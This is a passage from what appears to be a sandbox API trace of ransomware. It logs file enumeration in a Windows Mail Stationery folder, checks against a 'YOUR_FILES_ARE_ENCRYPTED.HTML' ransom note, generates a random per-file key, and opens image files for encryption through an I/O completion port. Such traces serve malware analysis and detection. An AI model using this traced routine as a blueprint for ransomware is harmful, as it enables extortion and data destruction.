cFileName="HandPrints.jpg", cAlternateFileName="HANDPR~1.JPG")) returned 1 [0170.748] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg") returned 83 [0170.748] lstrcmpW (lpString1="HandPrints.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.748] PathFindExtensionW (pszPath="HandPrints.jpg") returned=".jpg" [0170.748] lstrlenW (lpString=".jpg") returned 4 [0170.748] PathFindExtensionW (pszPath="HandPrints.jpg") returned=".jpg" [0170.748] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0170.748] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\handprints.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x594 [0170.749] GetFileSizeEx (in: hFile=0x594, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=4222) returned 1 [0170.749] GetProcessHeap () returned 0x270000 [0170.749] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x77091a8 [0170.751] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="C5") returned 2 [0170.751] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="F2") returned 2 [0170.751] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="3B") returned 2 [0170.751] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="07") returned 2 [0170.751] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="B4") returned 2 [0170.751] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="0F") returned 2 [0170.751] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="E2") returned 2 [0170.751] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="A8") returned 2 [0170.751] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="FB") returned 2 [0170.752] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="66") returned 2 [0170.752] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="A6") returned 2 [0170.752] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="02") returned 2 [0170.752] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="80") returned 2 [0170.752] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="B7") returned 2 [0170.752] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="AB") returned 2 [0170.752] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="B5") returned 2 [0170.752] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="C2") returned 2 [0170.752] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="08") returned 2 [0170.752] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="2B") returned 2 [0170.752] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="02") returned 2 [0170.752] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="2B") returned 2 [0170.752] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="D1") returned 2 [0170.752] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="12") returned 2 [0170.752] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="21") returned 2 [0170.752] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="23") returned 2 [0170.752] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="E5") returned 2 [0170.752] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="CF") returned 2 [0170.752] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="F3") returned 2 [0170.752] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="0E") returned 2 [0170.752] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="DA") returned 2 [0170.752] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="52") returned 2 [0170.752] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="7C") returned 2 [0170.753] lstrcpyW (in: lpString1=0x771925c, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg" [0170.753] CreateIoCompletionPort (FileHandle=0x594, ExistingCompletionPort=0x3a0, CompletionKey=0x77091a8, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0170.753] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x77091a8, lpOverlapped=0x77091a8) returned 1 [0170.753] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcab2b40, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcab2b40, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x41f57aa4, ftLastWriteTime.dwHighDateTime=0x1ca0409, nFileSizeHigh=0x0, nFileSizeLow=0xed, dwReserved0=0x0, dwReserved1=0x0, cFileName="Orange Circles.htm", cAlternateFileName="ORANGE~1.HTM")) returned 1 [0170.753] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm") returned 87 [0170.753] lstrcmpW (lpString1="Orange Circles.htm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.753] PathFindExtensionW (pszPath="Orange Circles.htm") returned=".htm" [0170.753] lstrlenW (lpString=".htm") returned 4 [0170.753] PathFindExtensionW (pszPath="Orange Circles.htm") returned=".htm" [0170.753] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0170.753] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\orange circles.htm"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0170.753] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=237) returned 1 [0170.754] CloseHandle (hObject=0x58c) returned 1 [0170.754] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcab2b40, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcab2b40, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8283f59c, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x18ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="OrangeCircles.jpg", cAlternateFileName="ORANGE~1.JPG")) returned 1 [0170.754] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg") returned 86 [0170.754] lstrcmpW (lpString1="OrangeCircles.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.754] PathFindExtensionW (pszPath="OrangeCircles.jpg") returned=".jpg" [0170.754] lstrlenW (lpString=".jpg") returned 4 [0170.754] PathFindExtensionW (pszPath="OrangeCircles.jpg") returned=".jpg" [0170.754] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0170.754] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\orangecircles.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0170.754] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=6381) returned 1 [0170.754] GetProcessHeap () returned 0x270000 [0170.754] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x750a450 [0170.758] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="0C") returned 2 [0170.758] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="31") returned 2 [0170.758] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="C8") returned 2 [0170.758] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="CC") returned 2 [0170.758] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="EA") returned 2 [0170.758] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="CD") returned 2 [0170.759] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="41") returned 2 [0170.759] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="2D") returned 2 [0170.759] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="E9") returned 2 [0170.759] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="B2") returned 2 [0170.759] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="C5") returned 2 [0170.759] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="C2") returned 2 [0170.759] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="A3") returned 2 [0170.759] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="CC") returned 2 [0170.759] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="80") returned 2 [0170.759] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="59") returned 2 [0170.759] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="40") returned 2 [0170.759] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="9C") returned 2 [0170.759] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="9A") returned 2 [0170.759] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="08") returned 2 [0170.759] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="48") returned 2 [0170.759] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="EF") returned 2 [0170.759] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="21") returned 2 [0170.759] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="71") returned 2 [0170.759] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="A7") returned 2 [0170.759] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="A4") returned 2 [0170.759] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="78") returned 2 [0170.759] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="26") returned 2 [0170.759] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="10") returned 2 [0170.759] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="D4") returned 2 [0170.760] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="1E") returned 2 [0170.760] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="05") returned 2 [0170.760] lstrcpyW (in: lpString1=0x751a504, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg" [0170.760] CreateIoCompletionPort (FileHandle=0x58c, ExistingCompletionPort=0x3a0, CompletionKey=0x750a450, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0170.760] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x750a450, lpOverlapped=0x750a450) returned 1 [0170.760] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcab2b40, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcab2b40, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x41fa3d64, ftLastWriteTime.dwHighDateTime=0x1ca0409, nFileSizeHigh=0x0, nFileSizeLow=0xe8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Peacock.htm", cAlternateFileName="")) returned 1 [0170.760] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm") returned 80 [0170.760] lstrcmpW (lpString1="Peacock.htm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.761] PathFindExtensionW (pszPath="Peacock.htm") returned=".htm" [0170.761] lstrlenW (lpString=".htm") returned 4 [0170.761] PathFindExtensionW (pszPath="Peacock.htm") returned=".htm" [0170.761] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0170.761] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.htm"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0170.761] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=232) returned 1 [0170.761] CloseHandle (hObject=0x598) returned 1 [0170.761] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcab2b40, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcab2b40, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x828d7b1c, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x13fb, dwReserved0=0x0, dwReserved1=0x0, cFileName="Peacock.jpg", cAlternateFileName="")) returned 1 [0170.762] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg") returned 80 [0170.762] lstrcmpW (lpString1="Peacock.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.762] PathFindExtensionW (pszPath="Peacock.jpg") returned=".jpg" [0170.762] lstrlenW (lpString=".jpg") returned 4 [0170.762] PathFindExtensionW (pszPath="Peacock.jpg") returned=".jpg" [0170.762] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0170.762] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0170.762] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=5115) returned 1 [0170.762] GetProcessHeap () returned 0x270000 [0170.762] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x75325a8 [0170.766] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="FD") returned 2 [0170.766] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="60") returned 2 [0170.766] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="2C") returned 2 [0170.766] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="C3") returned 2 [0170.766] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="3A") returned 2 [0170.766] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="AA") returned 2 [0170.767] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="29") returned 2 [0170.767] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="38") returned 2 [0170.767] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="5C") returned 2 [0170.767] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="F1") returned 2 [0170.767] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="4B") returned 2 [0170.767] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="F7") returned 2 [0170.767] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="BB") returned 2 [0170.767] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="76") returned 2 [0170.767] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="00") returned 2 [0170.767] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="2F") returned 2 [0170.767] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="BB") returned 2 [0170.767] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="77") returned 2 [0170.767] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="B9") returned 2 [0170.767] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="0E") returned 2 [0170.767] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="0A") returned 2 [0170.767] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="3B") returned 2 [0170.767] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="66") returned 2 [0170.767] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="5A") returned 2 [0170.767] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="F2") returned 2 [0170.767] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="F3") returned 2 [0170.767] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="3F") returned 2 [0170.767] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="CB") returned 2 [0170.767] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="6A") returned 2 [0170.767] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="71") returned 2 [0170.767] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="DE") returned 2 [0170.767] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="02") returned 2 [0170.768] lstrcpyW (in: lpString1=0x754265c, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg" [0170.768] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x75325a8, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0170.768] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x75325a8, lpOverlapped=0x75325a8) returned 1 [0170.768] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcab2b40, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcab2b40, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x41ff0024, ftLastWriteTime.dwHighDateTime=0x1ca0409, nFileSizeHigh=0x0, nFileSizeLow=0xe9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roses.htm", cAlternateFileName="")) returned 1 [0170.768] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm") returned 78 [0170.768] lstrcmpW (lpString1="Roses.htm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.768] PathFindExtensionW (pszPath="Roses.htm") returned=".htm" [0170.768] lstrlenW (lpString=".htm") returned 4 [0170.768] PathFindExtensionW (pszPath="Roses.htm") returned=".htm" [0170.768] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0170.768] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.htm"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5d8 [0170.769] GetFileSizeEx (in: hFile=0x5d8, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=233) returned 1 [0170.769] CloseHandle (hObject=0x5d8) returned 1 [0170.769] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbcab2b40, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbcab2b40, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x828fdc7c, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x780, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roses.jpg", cAlternateFileName="")) returned 1 [0170.769] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg") returned 78 [0170.769] lstrcmpW (lpString1="Roses.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.769] PathFindExtensionW (pszPath="Roses.jpg") returned=".jpg" [0170.769] lstrlenW (lpString=".jpg") returned 4 [0170.769] PathFindExtensionW (pszPath="Roses.jpg") returned=".jpg" [0170.769] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0170.769] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5d8 [0170.770] GetFileSizeEx (in: hFile=0x5d8, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=1920) returned 1 [0170.770] GetProcessHeap () returned 0x270000 [0170.770] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x755a700 [0170.773] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="A0") returned 2 [0170.773] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="50") returned 2 [0170.773] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="43") returned 2 [0170.773] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="C5") returned 2 [0170.773] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="AF") returned 2 [0170.774] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="F1") returned 2 [0170.774] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="70") returned 2 [0170.774] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="64") returned 2 [0170.774] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="AE") returned 2 [0170.774] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="97") returned 2 [0170.774] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="B0") returned 2 [0170.774] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="BF") returned 2 [0170.774] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="57") returned 2 [0170.774] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="D6") returned 2 [0170.774] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="B6") returned 2 [0170.774] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="46") returned 2 [0170.774] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="05") returned 2 [0170.774] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="EA") returned 2 [0170.774] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="89") returned 2 [0170.774] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="CA") returned 2 [0170.774] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="D5") returned 2 [0170.774] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="5D") returned 2 [0170.774] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="E4") returned 2 [0170.774] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="BC") returned 2 [0170.774] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="98") returned 2 [0170.774] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="D6") returned 2 [0170.774] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="AC") returned 2 [0170.774] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="A0") returned 2 [0170.774] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="F6") returned 2 [0170.774] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="47") returned 2 [0170.774] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="66") returned 2 [0170.774] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="6E") returned 2 [0170.775] lstrcpyW (in: lpString1=0x756a7b4, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg" [0170.775] CreateIoCompletionPort (FileHandle=0x5d8, ExistingCompletionPort=0x3a0, CompletionKey=0x755a700, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0170.775] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x755a700, lpOverlapped=0x755a700) returned 1 [0170.775] FindNextFileW (in: hFindFile=0x42f3240, 